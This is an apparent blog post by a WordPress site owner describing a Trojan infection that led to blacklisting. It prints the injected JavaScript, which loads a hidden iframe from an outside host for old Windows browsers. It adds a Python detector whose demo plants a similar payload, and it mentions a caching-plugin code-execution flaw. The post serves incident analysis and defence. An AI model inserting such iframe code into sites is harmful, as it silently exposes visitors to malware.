Literally today I finished sorting out an interesting and new task for myself: a site I look after turned out to be on the Yandex blacklist. The reason was the Troj/JSRedir-LK Trojan (according to Sophos).
I'll clarify: two sites ended up on the blacklist at once, one of which is a subdomain of the other, and below I describe what changes the Trojan made to each of them.
And this is what happened:
There are two scripts in the header.php file (subdomain),
and
,
in the footer.php file (subdomain), before - also a script with a link to ligaexpress,
and in the wp-includes folder of the parent site (domain) there is a google-analytics.php file ending with the following code:
    function showBrowVer() {
        var data = browserDetectNav();
        if (data[0]) {
            // Only fires for Opera, MSIE or Firefox <= 17, and only on Windows.
            // The single '&' is as found in the injected code (bitwise, but works here).
            if ((data[0] == 'Opera' || data[0] == 'MSIE' || (data[0] == 'Firefox' & data[1] <= 17)) & data[3] == 'Windows') {
                // A 2x2 pixel, invisible iframe is appended to the page.
                var js_kod2 = document.createElement('iframe');
                js_kod2.src = 'http://moradomedia.nl/new/php/one-style.php';
                js_kod2.width = '2px';
                js_kod2.height = '2px';
                js_kod2.style = 'visibility: hidden;';
                document.body.appendChild(js_kod2);
            }
        }
    }
Curiously, the link in js_kod2.src changed periodically.
It is also curious that, apart from Sophos itself, none of the antiviruses I used found anything, neither on the site nor on the computer, which I decided to check after fussing with the site. But the Sophos Virus Removal Tool did find that very Troj/JSRedir-LK, and in addition Troj/JSRedir-JK, both in Temporary Internet Files. For that I now strongly recommend it [1].
I will also recommend the Wordfence Security plugin for WordPress [2]. It won me over with its ability to scan files, including theme and plugin files, and compare them with the ones stored on WordPress.org. It is a pity that by the time it was installed and the scan had started, everything superfluous had already been removed.
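As an added example (not the author's code and not Wordfence's), a small Python checker in the spirit of what is described above: it walks wp-includes, reports files absent from a known-good manifest of core file hashes (the role the WordPress.org copies play for Wordfence), reports core files whose hash differs, and searches every file for the hidden-iframe injection pattern. The manifest, the sample tree and the URL in it are constructed for the demo.

```python
import hashlib
import os
import re
import tempfile

# Heuristic for the injection style shown above: an iframe is created and
# then shrunk to a couple of pixels or hidden outright.
IFRAME_INJECTION = re.compile(
    r"createElement\(\s*['\"]iframe['\"]\s*\).{0,400}?"
    r"(visibility:\s*hidden|width\s*=\s*['\"]?[0-2]px)",
    re.IGNORECASE | re.DOTALL)


def sha256_of(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def scan_wp_includes(root, known_good):
    """Return (unknown, modified, injected) relative paths under root/wp-includes.
    known_good maps relative path -> sha256 of the pristine core file."""
    unknown, modified, injected = [], [], []
    for dirpath, _, names in os.walk(os.path.join(root, "wp-includes")):
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if rel not in known_good:
                unknown.append(rel)           # file that core never shipped
            elif sha256_of(full) != known_good[rel]:
                modified.append(rel)          # core file tampered with
            with open(full, errors="replace") as fh:
                if IFRAME_INJECTION.search(fh.read()):
                    injected.append(rel)      # hidden-iframe payload present
    return sorted(unknown), sorted(modified), sorted(injected)


def build_demo_site():
    """Constructed sample: pristine core file, altered core file, rogue file."""
    root = tempfile.mkdtemp()
    inc = os.path.join(root, "wp-includes")
    os.makedirs(inc)
    clean = "<?php\n// pristine core file (constructed)\nfunction wp_foo() {}\n"
    rogue = ("<?php ?><script>var f=document.createElement('iframe');"
             "f.src='http://example.invalid/x.php';f.width='2px';"
             "f.style='visibility: hidden;';document.body.appendChild(f);</script>")
    for name, body in (("version.php", clean),
                       ("functions.php", clean + "// appended later (constructed)\n"),
                       ("google-analytics.php", rogue)):
        with open(os.path.join(inc, name), "w") as fh:
            fh.write(body)
    digest = hashlib.sha256(clean.encode()).hexdigest()
    return root, {"wp-includes/version.php": digest,
                  "wp-includes/functions.php": digest}
```

A real manifest would be built from the hashes of the matching WordPress release; the rogue google-analytics.php is caught twice here, once as an unknown file and once by the payload pattern.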
And more about WordPress (about the very vulnerability mentioned in the title of the article).
While I was looking for the hole through which the virus had got in, I found information that a vulnerability was discovered in caching plugins (namely WP Super Cache 1.2 and earlier; W3 Total Cache 0.9.2.8 and earlier) that allows a remote user to upload and execute arbitrary PHP code. Read more about it here [3] and here [4].
So keep your feet warm and your plugins updated. And, yes, do not store FTP passwords in Total Commander.
Thanks for your attention.
Links to what is mentioned in the text:
1. Virus Removal Tool from Sophos (free)
2. Wordfence Security plugin for WordPress
3. Detected dangerous vulnerability in caching plugins for WordPress, securitylab.ru
4. mfunc issue